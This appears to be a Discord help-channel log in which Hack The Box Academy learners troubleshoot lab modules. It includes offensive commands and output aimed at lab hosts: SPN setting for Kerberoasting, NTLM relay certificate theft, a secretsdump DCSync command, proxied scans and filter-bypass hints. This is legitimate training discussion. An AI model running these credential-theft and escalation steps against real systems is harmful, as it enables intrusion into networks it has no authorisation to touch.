I'm doing the AD ACL module of the CPTS path, why did the line below only work with -Credential set but not logged in as the same user (damundsen) ?
Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

Okay

im so confused

i told you. read the very first line in the section you're working on.

Hey guys

What is fastest & effective way to learn... Is starting from htb academy or go through htb labs to struggle & learn?

Heyo
Is general locked??

Idk im new here

same

i was here on my old acc but switched

Oh i see

hm I think academy is best

But im not too experienced

U think so?

yeaa #general

Read the #rules and follow the instructions in #welcome to gain access.

yea cause you get the basics if youre a super beginner

oh aight thanks so much dude

Like having basics is more important

definitely learn that before advancing

Thanks bro

What ur rank in labs?

This channel is dedicated for discussion of modules on Academy, please take this convo to #general

I still have no idea

can u nudge me a bit more please im so lost

you're not looking in the right place

It dont make sense the question lit asks for the contents of the first line IN the file, no?

Bruh I handed you the answer on a silver platter. Did you re-read the literaly first thing the module tells you and combine it with my hint that you're no in the right place?

Thanks, I'll do it

Thanks @cloud urchin , finally I solved it and I've finished the module. I tried that password before, but it didn't work for me. I don't understand why, perhaps I didn't the MAC bypass properly

Glad you got it

Yes, not showing the profiling output. Did you find a fix? Edit: Had to add all DNS names.

Please, the Password Attacks' skills assessment; when trying to enumerate the internal hosts, it would always return that the ports are filtered! are there special flags I need to use? Note: I am using SOCKS PROXY!

are you using proxychains to perform the network ports scan?

Yes! Because I can only access the DMZ01 VPN interface not the internal one!

So, a couple of questions:

1. Are you using the provided workstation in Academy, e.g., the pwnbox?
   1.1. If yes, run proxychains with sudo
2. Are you performing a TCP scan using the appropriate parameter in nmap?

No. I am using my own VM not the pwnbox. Below is the nmap command I use:
proxychains4 nmap 172.16.119.10 -sT -Pn -n --open --stats-every=30s --disable-arp-ping -sV -O -T3

Modify the command to enumerate ports that are the most common onces that you can think of, such as 80, 135, 443, 445 and so on

as to build a proof-of-concept that works, if that doesn't work, check your proxychains' configuration

Alright; Thank you so much. I do appreciate!

Hi, I'm new here so I'm not sure if this is the right place to ask but I'm having some troubles in the "pentest in a nutshell" module, could anyone help me or point me in the right direction of where to go?

My problem is in the section "Linux System Enumeration": https://academy.hackthebox.com/module/296/section/3396

The first command I'm supposed to run is to download LinPEAS from GitHub using the following command:
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

however, when I run that command the connection keeps timing out and I don't know what is causing it, if I open the browser on the machine and try to manually search for GitHub it also times out so I'm not sure if that is normal and my issue lies elsewhere or if that is the issue

I am stuck on Attacking Common Applications Exploiting Web Vulnerabilities in Thick-Client Applications I cant download the fatty-server.jar file even if I recomple the code

https://academy.hackthebox.com/module/113/section/2164

can i dm someone regarding AEN i am confused due to subnetting
nvm got it

hello, i have a question that could be simple but i can't figure it out. i am doing the skills assessment of the linux privilege esclation module, last flag (/root folder). i used a vulnerability for the OS to become root. i try id and get id=0(root) gid=0(root) groups=0(root). i ugrade to a full interactive tty with python3. then i cd to /root and i get permission denied. i am root, why can't i access?

Can I DM you, I'm facing the same issue?

If you are doing the LLM Output Attacks skills assessment make sure you are** logged in** with the provided credentials. I just spent a whole day trying to figure it out from an un authed position and it made me so mad because all I had to do was read the instructions 😒😒😒😒😒😒😒😒😒😒

hii, i need help regarding the module ATTACKING COMMON SERVICES...I AM STUCK AT SQL

any type of help will be much appriciated

i have big problem with windows attack defense module, cannot connet to rdp. Tried changing vpn configs, reseting target, tried both from gui app from cli nothing. Also tried both native rdp and xfreerdp https://academy.hackthebox.com/module/176/section/1779

Yesterday it worked but when i connect it, use it for 5 mins and it just restarts

and my internet is pretty stable but tried changing that too and nothing

terrible module which i need to complete before doing my cdsa

Yeah you can DM.

bro can u pls help me in attack common services module

I can try, go ahead and DM unless you can explain what the issue is without spoiling.

so I've been learning ligolo-ng after doing the pivoting lab and i was wondering if anyone could explain a bit about the networking behind the reverse shells for me. say there is a machine on 10.0.0.0/8 subnet and I am on a 172.16.1.0/24 subnet when accessing it, and there is an internal network on 192.168.220.0/24, when I use ligolo-ng to access it, for some reason I am able to get a reverse shell back from another machine in the internal network(not where my ligolo agent is) when I call back to my 172 ip. I was wondering how do the machines in the internal network send packets back to me if they are not cconnected to me?

Use ligolo bro it is not mentioned in module but it is the best for pivoting it will give issues for rdp then use timeout:60000

maybe its some kind of cleanup script? What did you do to become root exactly?

What is the tool you are using and what is the error you are facing

Can you elaborate it bit more

so my ip is 172.16.1.2, and the machine I set up ligolo agent is 10.50.50.50, and I can access this normally. this machine is connected to an internal network on the 192.168.220.0/24 range, so then I got access to a machine in the internal network, and I ran a reverse shell using the 172.16.1.2 as the callback ip and it somehow works, but I don't get why it should work

how does the machine in the internal network know how to route the packets to 172.16.1.2

Oh okay got it so what’s happening behind the scene is when you are running reverse shell you are giving ip of your attack host so when payload get executed it sends the connection back to the 10.50.50.50 machine where agent is running and via agent you get the reverse shell of it because agent route the traffic back to the attack host

Uh you'd typically need an agent in the target machine to get it to call back

Same as when we run rdp from our machine once we set route in our kali or attack box

Well Ligolo is what's routin your traffic here, in essence it serves as a virtual cable to the 192.x network. The ip address ranges aren't really too important as long as there's a route which ligolo or whatever networking device handles which\ allows you to connect to 10.x from 172.x
TLDR: which network you're in doesn't matter if you have proper routing setup which ligolo takes care of

If any issue dm me I’ll explain it via graph

I give up zZ any one know the answer to snort fundamentals zz it’s been 4months and I still can’t get it I don’t know what I’m doing zZ

Also watch this

https://youtu.be/qou7shRlX_s?si=S17-LKlWza9g-49P

i used this one liner: https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation/tree/main

Personally proxychains > ligolo for me 🤣

(skill issue)

How can you see the nmap result man🤣🤣

Easily

It did made my job easy in one of the module but Idk I like ligolo it is good for double, triple hops

We just have to use timeout that’s the only issue for now

If it's more than a double hop I'd use Ligolo tbh

Hey I'm working on the Pass the Certificate section in the Password Attacks module (https://academy.hackthebox.com/module/147/section/1335) I tried the NTLM Relay Attack method but once I force a connection to ntlmrelayx it times out and doesn't produce a certificate. For the shadow credentials method when I try to run evil-winrm it says Cannot find KDC for realm "INLANEFREIGHT.LOCAL" . I made sure I added the hosts to /etc/hosts and made the changes needed to /etc/krb5.conf so I'm not sure where i'm going wrong here. Please advise, Thanks!

Why did I get an incorrect answer, in fact, I input the correct answer like, HTB{.......}

Could you share error

Is Bloodhound preinstalled in HTB pwnbox?

maybe make sure that in the /etc/hosts file, the ip address is the dc01 ip address and not the CA service ip address

I get this error when trying to run Bloodhound in my pwnbox:

Docker is installed on this system, but the daemon is not running.

Is there a fix for this?

thanks I get it now. I was being a dumbass, the 10.50.50.50 machine has virtualbox and all those machines in the internal network are virtualized under it so ofc they go through the host machine and then they know how to get back to me

try and manually start the service for the bloodhound application

this is what my /etc/hosts looks like

shouldn't it be .local not .htb

yea should be .local

inlanefreight.local and dc01.inlanefreight.local

gotchu I'll try that

also as someone above said make sure that it is also configured on ur /etc/krb5.conf

u can know how to do that from the previous section in the same module

I changed the /etc/krb5.conf and /etc/hosts to inlanefreight.local and got the same error. In the krb5.conf It's now:

[libdefaults] default_realm = INLANEFREIGHT.LOCAL

I tried using ./bloodhound-cli but idk why the GUI isn't working.

I got it to work I had one more .HTB that i missed

that's great

Thanks for the help!

ofc

i am not that familiar with bloohound tbh, but maybe try and find a way to install it manually if docker isn't working, or reinstall it again

Yeah most of that was there by default so I didn't touch it

Hi

Still struggling with "Web Services and API attacks", whenever I try to send a request to the target, I only get 500 responses. When I send a SOAP request for an action, am I supposed to send it to the http://target:port/wsdl?wsdl or is there a better endpoint I'm supposed to send those to?

This is the script I'm using to test this out on, If someone would be kind enough to give me a sanity check and make sure I'm not doing something obviously wrong, I'd really appreciate it.

Im stuck on this too. Ive gone through the AD CS NTLM Relay Attack (ESC8) section and gotten /tmp/dc.ccache but it doesnt let me get the Administrator NT hash. Am i supposed to privesc through jesse?

Hello, I am on the Attacking Active Directory and NTDS.dit module https://academy.hackthebox.com/module/147/section/1326, I am on Q4. I have created the shadow copy, however, when I am trying to copy the NTDS.dit file it is responding with 'the process cannot access the file because it is being used by another process.' I wasn't sure if i should try killing the process on the target because i didn't want booted out or anything. Also, i think the hint on Q4 is actually meant for Q3...

make sure to properly configure krb5.conf and /etc/hosts

This is going to make my break my setup

Is there just a general lag to the academy domain ATM? I'm looking at 100mb download speed but nothing is really moving well in regards to any modules, refreshes etc.

When I run ntlmrelayx it connects but never gives any output other than SMBD-Thread-10 (process_request_thread): Received connection from 10.129.234.174, attacking target http://10.129.234.174

I got that error too the second time. I was able to do it successfully the first time but the second time I was getting an error and I reset it and it worked. I am still not able to get the Admin NT hash

Bro this is so scuffed

Command Injections
Page 12
Skills Assessment
What is the content of '/flag.txt'? i swear ive found the flag im sure of it but its telling me its incorrect any help ?

Make sure you don't have any additional spaces at the beginning or the end of the flag

tried that, its giving me a visual obfuscation for flag as 'f1l3' i feel like thats the problem

Hola Amigos,

I'm currently engaged with the Hacking Wordpress module and it seems like the module is broken.
I'm stuck at the User Enumeration section, i'm trying the same blog.inlanefreight.com to enumerate all users but there is no user present over there, not even admin. Moreover, the subdomain is directed to www.
Again, i tried with both module methods {curl -s -I http://blog.inlanefreight.com/?author=1 & curl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq} but all negative.

Is there something really going for this module or am i just making a blunder!!

I just passed the skills assessment part of MSSQL, Exchange, and SCCM Attacks. The last 2 flags were pretty much accessible at the same step, so I am wondering if this was intentional? It feels like the SCCM part of the skills assessment was cut short ...

Can I get HTB pwnbox bloodhound neo4j default server user and password please?

neo4j:neo4j

Someone Please

tysm

I'm having difficulty with that too. I dumped the hashes on J01 and I accessed DC01 with s**m's credentials and dumped the hashes there but none seem correct. I saw that you solved it later with a hash you had already tried. Can you give a small hint just in case I'm having the same problem (maybe send a PM).

Done, i was making just extreme blunder

Can anyone tell me which module has more content and new stuffs to learn : "Intro to Python3" or "Password Attacks" from TIER I

My data is not uploading to bloodhound in pwnbox. I am uploading from a local folder to bolt://localhost:7687. How do I fix this?

Hwy

they have different things to learn, not necessarily "more and new"

if you know nothing about py3, then all of the intro module will be new to you

I spent 4 hrs on the public exploit module by overthinking and had to use a hint … should I be mad at myself ? Me repeating all these basic scans tho got it engrained in my mind now

you're just starting out, you're bound to overlook simple things

sometimes we just need a push in the right direction because we get too caught up and narrowed down

a simple shortcut to remember is that (typically, unless otherwise specified) ip:port when you spawn target => web

does anyone know how to fix this issue with ntlmrelayx, I've tried restarting the box a few times but this same error comes up whenever I try to run it. I can force a connection with printerbug.py but ntlmrelayx just times out without returning a certificate.

Do not upload computers.json

it's likely because it's not launching an http server, the pwnbox is running a service on port 80 (it's what serves the pwnbox to your browser) iirc you can change that port with a flag

does it matter what port?

I was running a bunch of banner and nmap scans and looking into the ports instead of just looking at the plugin they use shown in the site lol way overthunk it

just one that isn't in use, but i'd stick with the standard non-defaults -- 8000,8080

Hi, I'm working on the following question of the Dynamic Port Forwarding with SSH and SOCKS Tunneling part of the Pivoting, Tunneling, and Port Forwarding module :

Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.

I established a SOCKS tunnel with : ssh -D 9050 ubuntu@10.129.249.17
I checked /etc/proxychains.conf : tail -4 /etc/proxychains.conf
socks4 127.0.0.1 9050

But when I nmap to scan the internal target : proxychains nmap -vv -Pn -sT 172.16.5.19

No open port shows up, but we know from the question port 3389 is open. I can RDP to it using proxychains xfreerdp /v:<IP> /u:<USER> /p:<PASS>, but I can't find the port with nmap. Any idea why ?

make sure the socks5 one is commented out

but nmap and proxychains can be iffy at best sometimes

I checked, there is no such line on my config

try scanning for the port directly

-p 3389

It shows as filtered

filtered != closed

you're making a common mistake

filtered just means the reply didn't come back as closed, but also no reply came back

But why do I get no response as I know it is open ?

likely because the packet, for whatever reason, couldn't find its way back to you

So that's likely because of proxychains ?

yes

Alright thank you, I'll try running it over and over to see if it comes back as open

i wouldn't get too focused on it ¯_(ツ)_/¯

imho if you understand the basic principles of pivoting - ligolo-ng is far better and doesn't do any of that proxychains nonsense

also try with sudo

sudo proxychains nmap...

Ok I'll check it !

That was indeed the solution, thanks for your help

Guys I don't see wlan0 interface on my vm

can anyone tell me how to install it

?

Youd need an external wireless adapter

and can't I use computer card for this?

can someone validate my hash?

this is def not the hash

i know..i cant remove it

this wasn't my answer too so i guess its wrong

i got system privileges on dc01.. .this is the first time i cant get the administrator domain admin hash lol

try to review the section of the NDTS.DIT file

i didnt want any tips

thanks for ruining it

this is not a tip tho u have the whole module in front of u

where would the answer be other than the module itself 🤷🏻‍♂️

Just DM me which section you did and the hash and I can compare it to mine.

i didn't give u any methods, but sorry if that ruined ur process mb didn't mean it :/

no need.,. i deleted the message with the hash

You don't still have it?

Lol, I said to DM it. Which section was that from?

password attacks skills assessement

the new version

That does not match what I have. You can DM what you did.

no im just going to try everythign in the NDTS.DIT section

@elder matrix in future, please don't share hashes -- even if only temporarily.

As a note ntlm hashes are formatted lm:nt

If lm is disabled; the lm portion will be the same for every user

If going through a proxy like burpsuite, it needs https

Also dont spoil module content

adding --http-port 8080 helped with the errors but it's still getting stuck here

ok

your not using the domain controllers IP addres G

-t http: //domaincontrollerip/certserv/certfnsh.asp

thats the domain controller ip, I tried the other one which didn't work either

Is this the Pass the Certificate in password attacks?

yeah

Oh weird for me the targets are 10.129.234.174 and 10.129.234.172 each time I spawn them.

Oh my god Im so stupid. I have to use 10.129.234.172 to get the Administrator NT hash dont i

I just restarted the targets, gonna see if that works

Ok I just did it. Do you wanna call and I can help you out?

Im working on the same module
r on port 6666

[] Servers started, waiting for connections
[] SMBD-Thread-5 (process_request_thread): Received connection from 10.129.234.174, attacking target http://10.129.234.172
[] HTTP server returned error code 200, treating as a successful login
[] Authenticating against http://10.129.234.172 as INLANEFREIGHT/DC01$ SUCCEED
[] SMBD-Thread-7 (process_request_thread): Received connection from 10.129.234.174, attacking target http://10.129.234.172
[-] Authenticating against http://10.129.234.172 as / FAILED
[] Generating CSR...
[] CSR generated!
[] Getting certificate...
[] GOT CERTIFICATE! ID 13
[] Writing PKCS#12 certificate to ./DC01$.pfx
[*] Certificate successfully written to file

Im gonna give it one more try. If that doesn't work I'll dm you

the issue looks like its in ur impacket-ntlmrelayx command.

the -t option should NOT be the domain controller.

It's supposed to be CA01 ?

-t = target URL or host that you want to forward the captured NTLM authentication to.

However after I get the dc.ccache file I cant perform a DCSync attack to get the NT hash of the domain admin account
impacket-secretsdump -k -no-pass -dc-ip 10.129.234.174 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[] Using the DRSUAPI method to get NTDS.DIT secrets
[-] 'NoneType' object has no attribute 'getRemoteHost'
[] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[] Cleaning up...
(.venv) ┌─[us-academy-1]─[10.10.15.130]─[htb-ac-1369176@htb-qxdliwg7t8]─[~/PKINITtools]
└──╼ [★]$

Is this not the intended path?

hi! im doing academy Windows Attacks & Defense skills assessment but keep getting this error when RDP in to the windows box (WS001) - "The trust relationship between this workstation and the primary domain failed"

Ok I figured out where I was going wrong with ntlmrelayx

can anyone give some advice or pointers on Command Injections
Page 12
Skills Assessment
What is the content of '/flag.txt'?

Im still stuck on this

hi anyone can help me in password attack module

I try to this but i cant

y try to do --format=ripemd-128 but doesnt work

OK I just did it and it worked. I have no clue why or what I did differently so Im just gonna celebrate sadly i guess.

Module bugged as hell.

i did it.

I got the NTLM hash I'm just trying to crack it now

Not bugged, the related hashes/info is in the reading

You dont need to just PtH

^

I mean the the green check. 😄

It says completed, I didn't even submit answers.

Did you do the module previously?

I did it

I have no clue why my shi wasnt working. I must have been doing something wrong but I guess i did it

Could be. Did they change it?

thanks anyway

Yes

That's why then.

Oh true

Hi everyone, i have just started the service scanning module in Penetration Testing path and i set a VPN connection using openvpn. Can someone explain me why this host in unreacheable?

Tell me if u need more

If i run nc to the host 94.237.123.118 : 44269 it works, giving me the banner of the service

Copy and paste the command written on the module

M

Im not really here to hack anything im mostly here to ask someone a favor

I have a question, each machine has its own VPN?

I would ask in genral but i cant use it

K thanks

No each machine doesn't but generally each module has you can download vpn file when you starting the module and it will serve you until you finish the module sometimes vpn's from other modules also work

If i download the VPN file fron the lab i cant use it for the academy?

Maybe this is the problem, where i can download the file for the academy?

in the bottom of each section of the module you will see a button download vpn file

Is this one?

yes this one

on kali linux this file is usually downloaded to home/user/Downloads folder and you can simply start it with the command openvpn /path/ to the vpn file

I think im strait up dumb

I dont know how to verify myself

I have downloaded this file, connected using sudo openvpn but when i run nmap 10.129.42.253 it says me that the host seems down. nmap 10.129.42.253 is the first command shown on this module

Wait what kind of hacking is done here i dont anything about it

sometimes it happens here that hosts are down

Im just trying to get back at someone in a harmless way

Oh sorry i didnt know mb

Ill leave then

yep

On the htb i see my connection active, on the academy i dont see it but i have just set the connection, as you have seen

sudo killall -9 openvpn

that screen shot shows 3 VPN connections

Ok, how can see if there is no connections more?

ip a

although you will need to open a single vpn connection afterwards

On the htb, i still see the active connection

If i run ip a and i dont ser tun interfaces

now only connect one time and you should be fine

also don't use the pwnbox at the same time as the VPN if you are using the pwnbox too

Im tryng

is that the target when you click click here to spawn target?

don't use both the labs and academy vpn at the same time

No, this is a command on the explaination

then that's why you're not connecting/seeing it

the example ip is just an EXAMPLE

Lol

Sorry im new here

I thought that command is a "real command", ready to try

always use the ip that's given after you click here to spawn target

it is a real command

you just need to replace the example ip with the spawned ip

Is anyone else working on Attacking Common Applications Module and have horrendous connections issues with the target machines

I have used that command

🙏🏻🙏🏻

again the 10.129.42.253 is an example you need to replace it with whatever 10.129.x.x ip is given

another tip (and this is something you'd learn from the Introduction to academy module) is that if the module gives you an ip:port -- that is your only scope, you do NOT scan the ip, as it's a public container and your scope is solely the port given

but the examples won't always be 1 to 1 what you need to do

sometimes you need to modify slightly

This because i want to scan just the specific service and not the entire host right?

often you won't need to nmap scan the port, as you'll be given enough context from the module on what to do

and often it involves using web reconnaissance

This the result of ifconfig after i have set connection with academy VPN, is it correct?

ye that looks fine

¯_(ツ)_/¯

Yes but there appears the network 10.10 and the IP spawned on the exercise of the module is 10.129

correct

because there's backend routing that makes that happen

Because i have connected to a VPN server that set my IP at 10.10, and the target is 10.129?

iirc the users get assigned 10.10.0.0/16 and the machine spawns are 10.129.0.0/16 (if on the private lab network)

yes there's backend routing that allows you to connect to the 10.129 target

Seems its working, really appreciate your help🙏🏻

they shouldn't be outdated if you feel it's an error that hasn't already been reported -> #1234357888114364508

anyone here finished the Information Gathering - Web Edition module, and could write me a PM? I could use some help with answers to these messed up Wayback Machine questions... 🙄

they aren't messed up

if you're referring to the question regarding hackthebox, htb didn't always use .com

man this is some unnecessary waste of time with all these Wayback Machine question imho

8questions to wayback machine

¯_(ツ)_/¯

but thanks for the hint

it's all useful to kinda get an idea of historical OSINT

yea i get it, and i agree

just it does not need 8 questions

2-3 is enough

/feedback exists :) (in this server)

Hello, in windows event logs skills assessment, I am wondering what the difference is between using FilterHashtable or not, because it looks like both outputs in powershell are the same? Just curious if there’s a specific reason why you might need to add that to a search

https://learn.microsoft.com/en-us/powershell/scripting/samples/creating-get-winevent-queries-with-filterhashtable?view=powershell-7.5

Anyone backed the artificial easy machine box that can help me out?

#boxes

I can’t see

You'll need to follow the instructions in #welcome to access

Ok

?

?

Can I DM anyone about Using Crackmapexec skill assessment?

You can DM me

Can anyone from Europe or US DM me ?

any reason for that?

am on the last step of the windows lateral movement skills assessment, could i get a slight nudge? im pulling my hair out here

Good day! Guys, please help me, I can't figure out what the login is for ssh.
Skills Assessment - Password Attacks
https://academy.hackthebox.com/module/147/section/1356

you mean the foothold? try generating usernames

I tried, it didn't work

i used username-anarchy iirc; you don't have to think about a password

(the reading brief explicitly gives you that info)

Okay, I'll try.

@fathom pendant Thank you very much! I found it!

You can DM me

done ty

Guys, having a mare here with Driect Prompt Injection, tried via three instances, I cannot tunnel the connection back via SSH...

Any advice?

https://academy.hackthebox.com/module/297/section/3413

Does The Live Engagement's foothold in Module: Shells & Payloads have not a browser?

I'm pretty sure you can just use xfreerdp for this if I recall correctly

I know, I have used xfreerdp to enter a linux system, but does not have a browser in it

Oh yeah I remember that you have to run firefox through the terminal

Oh my god, thank you. At first I thought there was no browser, and I kept using curl to submit files, but it didn't work.

I'm such a fool

Guys anyone tried file transfer module. In that to upload a zip file via rdp but how to download that file in attack machine because i tried use both curl and wget there is no internet connection
So how to do it

Hi Community
I cant get VNC creds in CAPE skill assesment lab, I make user Arturo as local administrator on SUPPORT but cant find vnc cred, please give some hints

Actually i use browser machine zip file cannot be downloaf

?

Yes

Hello I'm basically so stuck with this exercise in the command injection module, the first one worked right away but the w\ho\am\i is exhuasting me i tried to base64 encode it and then use the bash command in the post request to decode it didnt work only returns the ip, i tried $(tr) to convert [ into a \ also didnt work i need a clue what can i use to bypass the filter for this

Oh my god, the password attacks module was so brutal. Finally done it

Hi Community
I cant get VNC creds in CAPE skill assesment lab, I make user Arturo as local administrator on SUPPORT but cant find vnc cred, please give some hints

yeah it worked with single quotes

but i thought the exercise is to obfuscate the \

and i couldnt do that

it either gives me invalid input which means the filter got it

or just excutes the ip part

its not a flag im just practicing this excersise

it says try to excute those and if the filter gets u try to bypass it

i couldnt bypass it with anything i tried to hide or convert the \

for the whoami command

its w\ho\am\i

you mean replace the \ with spaces ?

yeah that worked with me i guess my brain is just stuck with you have to bypass with w\ho\am\i

@cunning canopytysm

Hello! I need some help with the File Inclusion skill assessment. So I basically got to the point where I'm in the Admin Panel and only need to use Log Poisoning in the access.log. But when I try the payload that adds a malicious script to the User-Agent header, it just doesn't give me back anything. I believe the app crashes whenever I try the payload. How am I suppose to solve it if the app crashes every time I try to use to final payload to get the flag?

Ok

Hi everyone i have one question from
https://academy.hackthebox.com/module/110/section/1055

third question

Hi Community
I cant get VNC creds in CAPE skill assesment lab, I make user Arturo as local administrator on SUPPORT but cant find vnc cred, please give some hints

https://academy.hackthebox.com/module/263/section/3095

5th question

can anyone please assist me?

you can DM me

Hello everyone! Could you please tell me where to find the SSH password for svc_workstations?
https://academy.hackthebox.com/module/147/section/1657

For a question:
Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.

Ok, for those of you having trouble getting to .90 model accuracy in the Applications of AI in Infosec skills assessment, go back to the Fundamentals of AI module and refamiliarize yourself with the learning algorithms that are good for binary classification.

On the Bypassing Blacklisted Commands module, for the Bypassing Blacklisted Commands, I do not see the flag.txt file in the user's home directory that I found, is anyone else having an issue with that?

This is more appropriate for #1318239802931286066

Does anyone have notes for Networking Level 6?

https://en.wikipedia.org/wiki/OSI_model#Layer_6:_Presentation_layer